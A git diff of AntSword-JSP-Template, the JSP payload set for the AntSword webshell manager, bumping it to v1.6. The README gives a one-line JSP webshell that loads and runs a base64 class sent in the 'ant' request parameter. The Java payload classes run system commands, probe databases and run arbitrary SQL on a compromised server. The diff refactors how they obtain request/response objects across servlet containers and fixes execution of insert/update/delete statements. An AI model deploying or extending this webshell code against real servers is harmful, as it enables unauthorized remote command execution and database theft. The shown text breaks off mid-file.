diff --git a/README.md b/README.md index 5ee0744..e072120 100644 --- a/README.md +++ b/README.md @@ -1,4 +1,4 @@ -# AntSword-JSP-Template v1.5 +# AntSword-JSP-Template v1.6 中国蚁剑JSP一句话Payload @@ -76,7 +76,7 @@ shell.jsp <% String cls = request.getParameter("ant"); if (cls != null) { - new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext); + new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(new Object[]{request,response}); } %> ``` @@ -113,12 +113,28 @@ shell.jspx String cls = request.getParameter("ant"); if (cls != null) { - new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext); + new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(new Object[]{request,response}); } ``` -其中`pageContext`可以替换为`request`,以实现对内存Webshell的兼容。 +其中 + +`new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(new Object[]{request,response});` + +可以替换为 + +`new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);` + +这种写法支持Tomcat/Weblogic,不支持如SpringBoot等不自带pageContext的容器。 + +或者 + +`new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(request);` + +这种写法支持Tomcat/SpringBoot/Weblogic等容器。原理是使用反射自动从request中提取出response,遇到比较特殊的容器可能会提取失败。 + +后两种为不推荐的写法,可能会在未来移除。 ## 解码器 @@ -173,10 +189,17 @@ $ base64 -w 0 AsoutputReverse.class } ``` - ## 更新日志 -### v1.5 +### v 1.6 + + +1. equals支持数组传参方式,兼容各种容器 +2. build.py中可以手动指定版本号编译,不再需要下载指定jdk +3. 部分变量转为类属性,方便调试 +4. 修正 insert/update/delete 语句无法执行问题 + +### v 1.5 1. 支持解码器(返回包加密) 2. 修复base64编码问题&改正错别字 diff --git a/build.py b/build.py index 5d4608a..1179045 100644 --- a/build.py +++ b/build.py @@ -11,6 +11,8 @@ # javac路径 如果 javac 不在 PATH 中, 请自己添加 javapath = r'javac' +# javac编译版本 +version = '1.5' pathsep = os.pathsep distDir = "./dist/" @@ -28,10 +30,11 @@ path = os.path.join(root, f) print('------------------------------------------------------------') print(path) - cmd = '"{javapath}" -cp {classpath} {path}'.format( + cmd = '"{javapath}" -cp {classpath} -source {version} -target {version} {path} '.format( javapath=javapath, classpath=classpath, - path=path + path=path, + version=version ) print(cmd) p=subprocess.Popen( diff --git a/src/base/Info.java b/src/base/Info.java index c8108d9..b213d3f 100644 --- a/src/base/Info.java +++ b/src/base/Info.java @@ -8,40 +8,15 @@ public class Info { public HttpServletRequest request = null; public HttpServletResponse response = null; - public String encoder; - public String cs; - public String randomPrefix; + public String encoder = "base64"; + public String cs = "antswordCharset"; + public String randomPrefix = "antswordrandomPrefix"; public String decoderClassdata; @Override public boolean equals(Object obj) { - try { - Class clazz = Class.forName("javax.servlet.jsp.PageContext"); - request = (HttpServletRequest) clazz.getDeclaredMethod("getRequest").invoke(obj); - response = (HttpServletResponse) clazz.getDeclaredMethod("getResponse").invoke(obj); - } catch (Exception e) { - if (obj instanceof HttpServletRequest) { - request = (HttpServletRequest) obj; - try { - Field req = request.getClass().getDeclaredField("request"); - req.setAccessible(true); - HttpServletRequest request2 = (HttpServletRequest) req.get(request); - Field resp = request2.getClass().getDeclaredField("response"); - resp.setAccessible(true); - response = (HttpServletResponse) resp.get(request2); - } catch (Exception ex) { - try { - response = (HttpServletResponse) request.getClass().getDeclaredMethod("getResponse").invoke(obj); - } catch (Exception ignored) { - - } - } - } - } - randomPrefix = "antswordrandomPrefix"; - encoder = "base64"; - cs = "antswordCharset"; - StringBuffer output = new StringBuffer(""); + this.parseObj(obj); + StringBuffer output = new StringBuffer(); String tag_s = "->|"; String tag_e = "|<-"; String varkeydecoder = "antswordargdecoder"; @@ -86,10 +61,42 @@ String WwwRootPathCode(String d) { return s.toString(); } + public void parseObj(Object obj) { + if (obj.getClass().isArray()) { + Object[] data = (Object[]) obj; + request = (HttpServletRequest) data[0]; + response = (HttpServletResponse) data[1]; + } else { + try { + Class clazz = Class.forName("javax.servlet.jsp.PageContext"); + request = (HttpServletRequest) clazz.getDeclaredMethod("getRequest").invoke(obj); + response = (HttpServletResponse) clazz.getDeclaredMethod("getResponse").invoke(obj); + } catch (Exception e) { + if (obj instanceof HttpServletRequest) { + request = (HttpServletRequest) obj; + try { + Field req = request.getClass().getDeclaredField("request"); + req.setAccessible(true); + HttpServletRequest request2 = (HttpServletRequest) req.get(request); + Field resp = request2.getClass().getDeclaredField("response"); + resp.setAccessible(true); + response = (HttpServletResponse) resp.get(request2); + } catch (Exception ex) { + try { + response = (HttpServletResponse) request.getClass().getDeclaredMethod("getResponse").invoke(obj); + } catch (Exception ignored) { + + } + } + } + } + } + } + public String asoutput(String str) { try { byte[] classBytes = Base64DecodeToByte(decoderClassdata); - java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", new Class[]{byte[].class, int.class, int.class}); + java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class); defineClassMethod.setAccessible(true); Class cc = (Class) defineClassMethod.invoke(this.getClass().getClassLoader(), classBytes, 0, classBytes.length); return cc.getConstructor(String.class).newInstance(str).toString(); diff --git a/src/base/Probedb.java b/src/base/Probedb.java index 384f8ec..bbce351 100644 --- a/src/base/Probedb.java +++ b/src/base/Probedb.java @@ -7,41 +7,15 @@ public class Probedb { public HttpServletRequest request = null; public HttpServletResponse response = null; - public String encoder; - public String cs; - public String randomPrefix; + public String encoder = "base64"; + public String cs = "antswordCharset"; + public String randomPrefix = "antswordrandomPrefix"; public String decoderClassdata; @Override public boolean equals(Object obj) { - try { - Class clazz = Class.forName("javax.servlet.jsp.PageContext"); - request = (HttpServletRequest) clazz.getDeclaredMethod("getRequest").invoke(obj); - response = (HttpServletResponse) clazz.getDeclaredMethod("getResponse").invoke(obj); - } catch (Exception e) { - if (obj instanceof HttpServletRequest) { - request = (HttpServletRequest) obj; - try { - Field req = request.getClass().getDeclaredField("request"); - req.setAccessible(true); - HttpServletRequest request2 = (HttpServletRequest) req.get(request); - Field resp = request2.getClass().getDeclaredField("response"); - resp.setAccessible(true); - response = (HttpServletResponse) resp.get(request2); - } catch (Exception ex) { - try { - response = (HttpServletResponse) request.getClass().getDeclaredMethod("getResponse").invoke(obj); - } catch (Exception ignored) { - - } - } - } - } - - randomPrefix = "antswordrandomPrefix"; - encoder = "base64"; - cs = "antswordCharset"; - StringBuffer output = new StringBuffer(""); + this.parseObj(obj); + StringBuffer output = new StringBuffer(); String tag_s = "->|"; String tag_e = "|<-"; String varkeydecoder = "antswordargdecoder"; @@ -83,10 +57,42 @@ String ProbedbCode(HttpServletRequest r) { return ret; } + public void parseObj(Object obj) { + if (obj.getClass().isArray()) { + Object[] data = (Object[]) obj; + request = (HttpServletRequest) data[0]; + response = (HttpServletResponse) data[1]; + } else { + try { + Class clazz = Class.forName("javax.servlet.jsp.PageContext"); + request = (HttpServletRequest) clazz.getDeclaredMethod("getRequest").invoke(obj); + response = (HttpServletResponse) clazz.getDeclaredMethod("getResponse").invoke(obj); + } catch (Exception e) { + if (obj instanceof HttpServletRequest) { + request = (HttpServletRequest) obj; + try { + Field req = request.getClass().getDeclaredField("request"); + req.setAccessible(true); + HttpServletRequest request2 = (HttpServletRequest) req.get(request); + Field resp = request2.getClass().getDeclaredField("response"); + resp.setAccessible(true); + response = (HttpServletResponse) resp.get(request2); + } catch (Exception ex) { + try { + response = (HttpServletResponse) request.getClass().getDeclaredMethod("getResponse").invoke(obj); + } catch (Exception ignored) { + + } + } + } + } + } + } + public String asoutput(String str) { try { byte[] classBytes = Base64DecodeToByte(decoderClassdata); - java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", new Class[]{byte[].class, int.class, int.class}); + java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class); defineClassMethod.setAccessible(true); Class cc = (Class) defineClassMethod.invoke(this.getClass().getClassLoader(), classBytes, 0, classBytes.length); return cc.getConstructor(String.class).newInstance(str).toString(); diff --git a/src/command/Exec.java b/src/command/Exec.java index d7fbfbe..adfab77 100644 --- a/src/command/Exec.java +++ b/src/command/Exec.java @@ -13,40 +13,15 @@ public class Exec { public HttpServletRequest request = null; public HttpServletResponse response = null; - public String encoder; - public String cs; - public String randomPrefix; + public String encoder = "base64"; + public String cs = "antswordCharset"; + public String randomPrefix = "antswordrandomPrefix"; public String decoderClassdata; @Override public boolean equals(Object obj) { - try { - Class clazz = Class.forName("javax.servlet.jsp.PageContext"); - request = (HttpServletRequest) clazz.getDeclaredMethod("getRequest").invoke(obj); - response = (HttpServletResponse) clazz.getDeclaredMethod("getResponse").invoke(obj); - } catch (Exception e) { - if (obj instanceof HttpServletRequest) { - request = (HttpServletRequest) obj; - try { - Field req = request.getClass().getDeclaredField("request"); - req.setAccessible(true); - HttpServletRequest request2 = (HttpServletRequest) req.get(request); - Field resp = request2.getClass().getDeclaredField("response"); - resp.setAccessible(true); - response = (HttpServletResponse) resp.get(request2); - } catch (Exception ex) { - try { - response = (HttpServletResponse) request.getClass().getDeclaredMethod("getResponse").invoke(obj); - } catch (Exception ignored) { - - } - } - } - } - randomPrefix = "antswordrandomPrefix"; - encoder = "base64"; - cs = "antswordCharset"; - StringBuffer output = new StringBuffer(""); + this.parseObj(obj); + StringBuffer output = new StringBuffer(); String tag_s = "->|"; String tag_e = "|<-"; String varkey1 = "antswordargbin"; @@ -101,7 +76,7 @@ String decode(String str) throws Exception { } public String ExecuteCommandCode(String cmdPath, String command, String envstr) throws Exception { - StringBuffer sb = new StringBuffer(""); + StringBuffer sb = new StringBuffer(); String[] c = {cmdPath, !isWin() ? "-c" : "/c", command}; Map readonlyenv = System.getenv(); Map cmdenv = new HashMap(readonlyenv); @@ -127,9 +102,7 @@ public String ExecuteCommandCode(String cmdPath, String command, String envstr) boolean isWin() { String osname = System.getProperty("os.name"); osname = osname.toLowerCase(); - if (osname.startsWith("win")) - return true; - return false; + return osname.startsWith("win"); } void CopyInputStream(InputStream is, StringBuffer sb) throws Exception { @@ -141,10 +114,42 @@ void CopyInputStream(InputStream is, StringBuffer sb) throws Exception { br.close(); } + public void parseObj(Object obj) { + if (obj.getClass().isArray()) { + Object[] data = (Object[]) obj; + request = (HttpServletRequest) data[0]; + response = (HttpServletResponse) data[1]; + } else { + try { + Class clazz = Class.forName("javax.servlet.jsp.PageContext"); + request = (HttpServletRequest) clazz.getDeclaredMethod("getRequest").invoke(obj); + response = (HttpServletResponse) clazz.getDeclaredMethod("getResponse").invoke(obj); + } catch (Exception e) { + if (obj instanceof HttpServletRequest) { + request = (HttpServletRequest) obj; + try { + Field req = request.getClass().getDeclaredField("request"); + req.setAccessible(true); + HttpServletRequest request2 = (HttpServletRequest) req.get(request); + Field resp = request2.getClass().getDeclaredField("response"); + resp.setAccessible(true); + response = (HttpServletResponse) resp.get(request2); + } catch (Exception ex) { + try { + response = (HttpServletResponse) request.getClass().getDeclaredMethod("getResponse").invoke(obj); + } catch (Exception ignored) { + + } + } + } + } + } + } + public String asoutput(String str) { try { byte[] classBytes = Base64DecodeToByte(decoderClassdata); - java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", new Class[]{byte[].class, int.class, int.class}); + java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class); defineClassMethod.setAccessible(true); Class cc = (Class) defineClassMethod.invoke(this.getClass().getClassLoader(), classBytes, 0, classBytes.length); return cc.getConstructor(String.class).newInstance(str).toString(); diff --git a/src/command/Listcmd.java b/src/command/Listcmd.java index 8d49b87..249c1ef 100644 --- a/src/command/Listcmd.java +++ b/src/command/Listcmd.java @@ -9,40 +9,15 @@ public class Listcmd { public HttpServletRequest request = null; public HttpServletResponse response = null; - public String encoder; - public String cs; - public String randomPrefix; + public String encoder = "base64"; + public String cs = "antswordCharset"; + public String randomPrefix = "antswordrandomPrefix"; public String decoderClassdata; @Override public boolean equals(Object obj) { - try { - Class clazz = Class.forName("javax.servlet.jsp.PageContext"); - request = (HttpServletRequest) clazz.getDeclaredMethod("getRequest").invoke(obj); - response = (HttpServletResponse) clazz.getDeclaredMethod("getResponse").invoke(obj); - } catch (Exception e) { - if (obj instanceof HttpServletRequest) { - request = (HttpServletRequest) obj; - try { - Field req = request.getClass().getDeclaredField("request"); - req.setAccessible(true); - HttpServletRequest request2 = (HttpServletRequest) req.get(request); - Field resp = request2.getClass().getDeclaredField("response"); - resp.setAccessible(true); - response = (HttpServletResponse) resp.get(request2); - } catch (Exception ex) { - try { - response = (HttpServletResponse) request.getClass().getDeclaredMethod("getResponse").invoke(obj); - } catch (Exception ignored) { - - } - } - } - } - randomPrefix = "antswordrandomPrefix"; - encoder = "base64"; - cs = "antswordCharset"; - StringBuffer output = new StringBuffer(""); + this.parseObj(obj); + StringBuffer output = new StringBuffer(); String tag_s = "->|"; String tag_e = "|<-"; String varkey1 = "antswordargbinarr"; @@ -106,10 +81,42 @@ String ListcmdCode(String binarrstr) { return ret; } + public void parseObj(Object obj) { + if (obj.getClass().isArray()) { + Object[] data = (Object[]) obj; + request = (HttpServletRequest) data[0]; + response = (HttpServletResponse) data[1]; + } else { + try { + Class clazz = Class.forName("javax.servlet.jsp.PageContext"); + request = (HttpServletRequest) clazz.getDeclaredMethod("getRequest").invoke(obj); + response = (HttpServletResponse) clazz.getDeclaredMethod("getResponse").invoke(obj); + } catch (Exception e) { + if (obj instanceof HttpServletRequest) { + request = (HttpServletRequest) obj; + try { + Field req = request.getClass().getDeclaredField("request"); + req.setAccessible(true); + HttpServletRequest request2 = (HttpServletRequest) req.get(request); + Field resp = request2.getClass().getDeclaredField("response"); + resp.setAccessible(true); + response = (HttpServletResponse) resp.get(request2); + } catch (Exception ex) { + try { + response = (HttpServletResponse) request.getClass().getDeclaredMethod("getResponse").invoke(obj); + } catch (Exception ignored) { + + } + } + } + } + } + } + public String asoutput(String str) { try { byte[] classBytes = Base64DecodeToByte(decoderClassdata); - java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", new Class[]{byte[].class, int.class, int.class}); + java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class); defineClassMethod.setAccessible(true); Class cc = (Class) defineClassMethod.invoke(this.getClass().getClassLoader(), classBytes, 0, classBytes.length); return cc.getConstructor(String.class).newInstance(str).toString(); diff --git a/src/database/mysql/Query.java b/src/database/mysql/Query.java index aac4adc..769a60a 100644 --- a/src/database/mysql/Query.java +++ b/src/database/mysql/Query.java @@ -3,49 +3,20 @@ import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; import java.lang.reflect.Field; -import java.sql.DriverManager; -import java.sql.Connection; -import java.sql.Statement; -import java.sql.ResultSet; -import java.sql.ResultSetMetaData; +import java.sql.*; public class Query { public HttpServletRequest request = null; public HttpServletResponse response = null; - public String encoder; - public String cs; - public String randomPrefix; + public String encoder = "base64"; + public String cs = "antswordCharset"; + public String randomPrefix = "antswordrandomPrefix"; public String decoderClassdata; @Override public boolean equals(Object obj) { - try { - Class clazz = Class.forName("javax.servlet.jsp.PageContext"); - request = (HttpServletRequest) clazz.getDeclaredMethod("getRequest").invoke(obj); - response = (HttpServletResponse) clazz.getDeclaredMethod("getResponse").invoke(obj); - } catch (Exception e) { - if (obj instanceof HttpServletRequest) { - request = (HttpServletRequest) obj; - try { - Field req = request.getClass().getDeclaredField("request"); - req.setAccessible(true); - HttpServletRequest request2 = (HttpServletRequest) req.get(request); - Field resp = request2.getClass().getDeclaredField("response"); - resp.setAccessible(true); - response = (HttpServletResponse) resp.get(request2); - } catch (Exception ex) { - try { - response = (HttpServletResponse) request.getClass().getDeclaredMethod("getResponse").invoke(obj); - } catch (Exception ignored) { - - } - } - } - } - randomPrefix = "antswordrandomPrefix"; - encoder = "base64"; - cs = "antswordCharset"; - StringBuffer output = new StringBuffer(""); + this.parseObj(obj); + StringBuffer output = new StringBuffer(); String tag_s = "->|"; String tag_e = "|<-"; String varkey1 = "antswordargencode"; @@ -92,7 +63,7 @@ String Base64Encode(String str) { String ret = ""; if (version.compareTo("1.9") >= 0) { Class Base64 = Class.forName("java.util.Base64"); - Object Encoder = Base64.getMethod("getEncoder", new Class[0]).invoke(Base64, new Object[]{}); + Object Encoder = Base64.getMethod("getEncoder", new Class[0]).invoke(Base64); ret = (String) Encoder.getClass().getMethod("encodeToString", byte[].class).invoke(Encoder, str.getBytes()); } else { Class Base64 = Class.forName("sun.misc.BASE64Encoder"); @@ -114,23 +85,36 @@ String executeSQL(String encode, String conn, String sql, String columnsep, Stri String url = x[1] + "&characterEncoding=" + encode; Connection c = DriverManager.getConnection(url); Statement stmt = c.createStatement(); - ResultSet rs = stmt.executeQuery(sql); - ResultSetMetaData rsmd = rs.getMetaData(); + boolean isRS = stmt.execute(sql); + if (isRS) { + ResultSet rs = stmt.getResultSet(); + ResultSetMetaData rsmd = rs.getMetaData(); - if (needcoluname) { - for (int i = 1; i <= rsmd.getColumnCount(); i++) { - String columnName = rsmd.getColumnName(i); - ret += columnName + columnsep; + if (needcoluname) { + for (int i = 1; i <= rsmd.getColumnCount(); i++) { + String columnName = rsmd.getColumnName(i); + ret += columnName + columnsep; + } + ret += rowsep; } - ret += rowsep; - } - while (rs.next()) { - for (int i = 1; i <= rsmd.getColumnCount(); i++) { - String columnValue = rs.getString(i); - ret += Base64Encode(columnValue) + columnsep; + while (rs.next()) { + for (int i = 1; i <= rsmd.getColumnCount(); i++) { + String columnValue = rs.getString(i); + ret += Base64Encode(columnValue) + columnsep; + } + ret += rowsep; + } + } else { + ret += "Result" + columnsep + rowsep; + int rowCount = stmt.getUpdateCount(); + if (rowCount > 0) { + ret += Base64Encode("Rows changed = " + rowCount) + columnsep + rowsep; + } else if (rowCount == 0) { + ret += Base64Encode("No rows changed or statement was DDL command") + columnsep + rowsep; + } else { + ret += Base64Encode("False") + columnsep + rowsep; } - ret += rowsep; } return ret; } @@ -141,10 +125,42 @@ String query(String encode, String conn, String sql) throws Exception { return executeSQL(encode, conn, sql, columnsep, rowsep, true); } + public void parseObj(Object obj) { + if (obj.getClass().isArray()) { + Object[] data = (Object[]) obj; + request = (HttpServletRequest) data[0]; + response = (HttpServletResponse) data[1]; + } else { + try { + Class clazz = Class.forName("javax.servlet.jsp.PageContext"); + request = (HttpServletRequest) clazz.getDeclaredMethod("getRequest").invoke(obj); + response = (HttpServletResponse) clazz.getDeclaredMethod("getResponse").invoke(obj); + } catch (Exception e) { + if (obj instanceof HttpServletRequest) { + request = (HttpServletRequest) obj; + try { + Field req = request.getClass().getDeclaredField("request"); + req.setAccessible(true); + HttpServletRequest request2 = (HttpServletRequest) req.get(request); + Field resp = request2.getClass().getDeclaredField("response"); + resp.setAccessible(true); + response = (HttpServletResponse) resp.get(request2); + } catch (Exception ex) { + try { + response = (HttpServletResponse) request.getClass().getDeclaredMethod("getResponse").invoke(obj); + } catch (Exception ignored) { + + } + } + } + } + } + } + public String asoutput(String str) { try { byte[] classBytes = Base64DecodeToByte(decoderClassdata); - java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", new Class[]{byte[].class, int.class, int.class}); + java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class); defineClassMethod.setAccessible(true); Class cc = (Class) defineClassMethod.invoke(this.getClass().getClassLoader(), classBytes, 0, classBytes.length); return cc.getConstructor(String.class).newInstance(str).toString(); diff --git a/src/database/mysql/Show_columns.java b/src/database/mysql/Show_columns.java index e14400d..db1962c 100644 --- a/src/database/mysql/Show_columns.java +++ b/src/database/mysql/Show_columns.java @@ -3,49 +3,20 @@ import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; import java.lang.reflect.Field; -import java.sql.DriverManager; -import java.sql.Connection; -import java.sql.Statement; -import java.sql.ResultSet; -import java.sql.ResultSetMetaData; +import java.sql.*; public class Show_columns { public HttpServletRequest request = null; public HttpServletResponse response = null; - public String encoder; - public String cs; - public String randomPrefix; + public String encoder = "base64"; + public String cs = "antswordCharset"; + public String randomPrefix = "antswordrandomPrefix"; public String decoderClassdata; @Override public boolean equals(Object obj) { - try { - Class clazz = Class.forName("javax.servlet.jsp.PageContext"); - request = (HttpServletRequest) clazz.getDeclaredMethod("getRequest").invoke(obj); - response = (HttpServletResponse) clazz.getDeclaredMethod("getResponse").invoke(obj); - } catch (Exception e) { - if (obj instanceof HttpServletRequest) { - request = (HttpServletRequest) obj; - try { - Field req = request.getClass().getDeclaredField("request"); - req.setAccessible(true); - HttpServletRequest request2 = (HttpServletRequest) req.get(request); - Field resp = request2.getClass().getDeclaredField("response"); - resp.setAccessible(true); - response = (HttpServletResponse) resp.get(request2); - } catch (Exception ex) { - try { - response = (HttpServletResponse) request.getClass().getDeclaredMethod("getResponse").invoke(obj); - } catch (Exception ignored) { - - } - } - } - } - randomPrefix = "antswordrandomPrefix"; - encoder = "base64"; - cs = "antswordCharset"; - StringBuffer output = new StringBuffer(""); + this.parseObj(obj); + StringBuffer output = new StringBuffer(); String tag_s = "->|"; String tag_e = "|<-"; String varkey1 = "antswordargencode"; @@ -124,10 +95,42 @@ String showColumns(String encode, String conn, String dbname, String table) thro return executeSQL(encode, conn, sql, columnsep, rowsep, true); } + public void parseObj(Object obj) { + if (obj.getClass().isArray()) { + Object[] data = (Object[]) obj; + request = (HttpServletRequest) data[0]; + response = (HttpServletResponse) data[1]; + } else { + try { + Class clazz = Class.forName("javax.servlet.jsp.PageContext"); + request = (HttpServletRequest) clazz.getDeclaredMethod("getRequest").invoke(obj); + response = (HttpServletResponse) clazz.getDeclaredMethod("getResponse").invoke(obj); + } catch (Exception e) { + if (obj instanceof HttpServletRequest) { + request = (HttpServletRequest) obj; + try { + Field req = request.getClass().getDeclaredField("request"); + req.setAccessible(true); + HttpServletRequest request2 = (HttpServletRequest) req.get(request); + Field resp = request2.getClass().getDeclaredField("response"); + resp.setAccessible(true); + response = (HttpServletResponse) resp.get(request2); + } catch (Exception ex) { + try { + response = (HttpServletResponse) request.getClass().getDeclaredMethod("getResponse").invoke(obj); + } catch (Exception ignored) { + + } + } + } + } + } + } + public String asoutput(String str) { try { byte[] classBytes = Base64DecodeToByte(decoderClassdata); - java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", new Class[]{byte[].class, int.class, int.class}); + java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class); defineClassMethod.setAccessible(true); Class cc = (Class) defineClassMethod.invoke(this.getClass().getClassLoader(), classBytes, 0, classBytes.length); return cc.getConstructor(String.class).newInstance(str).toString(); diff --git a/src/database/mysql/Show_databases.java b/src/database/mysql/Show_databases.java index 04a0766..0fcdec4 100644 --- a/src/database/mysql/Show_databases.java +++ b/src/database/mysql/Show_databases.java @@ -3,49 +3,20 @@ import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; import java.lang.reflect.Field; -import java.sql.DriverManager; -import java.sql.Connection; -import java.sql.Statement; -import java.sql.ResultSet; -import java.sql.ResultSetMetaData; +import java.sql.*; public class Show_databases { public HttpServletRequest request = null; public HttpServletResponse response = null; - public String encoder; - public String cs; - public String randomPrefix; + public String encoder = "base64"; + public String cs = "antswordCharset"; + public String randomPrefix = "antswordrandomPrefix"; public String decoderClassdata; @Override public boolean equals(Object obj) { - try { - Class clazz = Class.forName("javax.servlet.jsp.PageContext"); - request = (HttpServletRequest) clazz.getDeclaredMethod("getRequest").invoke(obj); - response = (HttpServletResponse) clazz.getDeclaredMethod("getResponse").invoke(obj); - } catch (Exception e) { - if (obj instanceof HttpServletRequest) { - request = (HttpServletRequest) obj; - try { - Field req = request.getClass().getDeclaredField("request"); - req.setAccessible(true); - HttpServletRequest request2 = (HttpServletRequest) req.get(request); - Field resp = request2.getClass().getDeclaredField("response"); - resp.setAccessible(true); - response = (HttpServletResponse) resp.get(request2); - } catch (Exception ex) { - try { - response = (HttpServletResponse) request.getClass().getDeclaredMethod("getResponse").invoke(obj); - } catch (Exception ignored) { - - } - } - } - } - randomPrefix = "antswordrandomPrefix"; - encoder = "base64"; - cs = "antswordCharset"; - StringBuffer output = new StringBuffer(""); + this.parseObj(obj); + StringBuffer output = new StringBuffer(); String tag_s = "->|"; String tag_e = "|<-"; String varkey1 = "antswordargencode"; @@ -119,10 +90,42 @@ String showDatabases(String encode, String conn) throws Exception { return executeSQL(encode, conn, sql, columnsep, rowsep, false); } + public void parseObj(Object obj) { + if (obj.getClass().isArray()) { + Object[] data = (Object[]) obj; + request = (HttpServletRequest) data[0]; + response = (HttpServletResponse) data[1]; + } else { + try { + Class clazz = Class.forName("javax.servlet.jsp.PageContext"); + request = (HttpServletRequest) clazz.getDeclaredMethod("getRequest").invoke(obj); + response = (HttpServletResponse) clazz.getDeclaredMethod("getResponse").invoke(obj); + } catch (Exception e) { + if (obj instanceof HttpServletRequest) { + request = (HttpServletRequest) obj; + try { + Field req = request.getClass().getDeclaredField("request"); + req.setAccessible(true); + HttpServletRequest request2 = (HttpServletRequest) req.get(request); + Field resp = request2.getClass().getDeclaredField("response"); + resp.setAccessible(true); + response = (HttpServletResponse) resp.get(request2); + } catch (Exception ex) { + try { + response = (HttpServletResponse) request.getClass().getDeclaredMethod("getResponse").invoke(obj); + } catch (Exception ignored) { + + } + } + } + } + } + } + public String asoutput(String str) { try { byte[] classBytes = Base64DecodeToByte(decoderClassdata); - java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", new Class[]{byte[].class, int.class, int.class}); + java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class); defineClassMethod.setAccessible(true); Class cc = (Class) defineClassMethod.invoke(this.getClass().getClassLoader(), classBytes, 0, classBytes.length); return cc.getConstructor(String.class).newInstance(str).toString(); diff --git a/src/database/mysql/Show_tables.java b/src/database/mysql/Show_tables.java index 1a48d9b..659307e 100644 --- a/src/database/mysql/Show_tables.java +++ b/src/database/mysql/Show_tables.java @@ -3,49 +3,20 @@ import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; import java.lang.reflect.Field; -import java.sql.DriverManager; -import java.sql.Connection; -import java.sql.Statement; -import java.sql.ResultSet; -import java.sql.ResultSetMetaData; +import java.sql.*; public class Show_tables { public HttpServletRequest request = null; public HttpServletResponse response = null; - public String encoder; - public String cs; - public String randomPrefix; + public String encoder = "base64"; + public String cs = "antswordCharset"; + public String randomPrefix = "antswordrandomPrefix"; public String decoderClassdata; @Override public boolean equals(Object obj) { - try { - Class clazz = Class.forName("javax.servlet.jsp.PageContext"); - request = (HttpServletRequest) clazz.getDeclaredMethod("getRequest").invoke(obj); - response = (HttpServletResponse) clazz.getDeclaredMethod("getResponse").invoke(obj); - } catch (Exception e) { - if (obj instanceof HttpServletRequest) { - request = (HttpServletRequest) obj; - try { - Field req = request.getClass().getDeclaredField("request"); - req.setAccessible(true); - HttpServletRequest request2 = (HttpServletRequest) req.get(request); - Field resp = request2.getClass().getDeclaredField("response"); - resp.setAccessible(true); - response = (HttpServletResponse) resp.get(request2); - } catch (Exception ex) { - try { - response = (HttpServletResponse) request.getClass().getDeclaredMethod("getResponse").invoke(obj); - } catch (Exception ignored) { - - } - } - } - } - randomPrefix = "antswordrandomPrefix"; - encoder = "base64"; - cs = "antswordCharset"; - StringBuffer output = new StringBuffer(""); + this.parseObj(obj); + StringBuffer output = new StringBuffer(); String tag_s = "->|"; String tag_e = "|<-"; @@ -123,10 +94,42 @@ String showTables(String encode, String conn, String dbname) throws Exception { return executeSQL(encode, conn, sql, columnsep, rowsep, false); } + public void parseObj(Object obj) { + if (obj.getClass().isArray()) { + Object[] data = (Object[]) obj; + request = (HttpServletRequest) data[0]; + response = (HttpServletResponse) data[1]; + } else { + try { + Class clazz = Class.forName("javax.servlet.jsp.PageContext"); + request = (HttpServletRequest) clazz.getDeclaredMethod("getRequest").invoke(obj); + response = (HttpServletResponse) clazz.getDeclaredMethod("getResponse").invoke(obj); + } catch (Exception e) { + if (obj instanceof HttpServletRequest) { + request = (HttpServletRequest) obj; + try { + Field req = request.getClass().getDeclaredField("request"); + req.setAccessible(true); + HttpServletRequest request2 = (HttpServletRequest) req.get(request); + Field resp = request2.getClass().getDeclaredField("response"); + resp.setAccessible(true); + response = (HttpServletResponse) resp.get(request2); + } catch (Exception ex) { + try { + response = (HttpServletResponse) request.getClass().getDeclaredMethod("getResponse").invoke(obj); + } catch (Exception ignored) { + + } + } + } + } + } + } + public String asoutput(String str) { try { byte[] classBytes = Base64DecodeToByte(decoderClassdata); - java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", new Class[]{byte[].class, int.class, int.class}); + java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class); defineClassMethod.setAccessible(true); Class cc = (Class) defineClassMethod.invoke(this.getClass().getClassLoader(), classBytes, 0, classBytes.length); return cc.getConstructor(String.class).newInstance(str).toString(); diff --git a/src/database/oracle/Query.java b/src/database/oracle/Query.java index 6778df0..5437da6 100644 --- a/src/database/oracle/Query.java +++ b/src/database/oracle/Query.java @@ -3,49 +3,20 @@ import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; import java.lang.reflect.Field; -import java.sql.DriverManager; -import java.sql.Connection; -import java.sql.Statement; -import 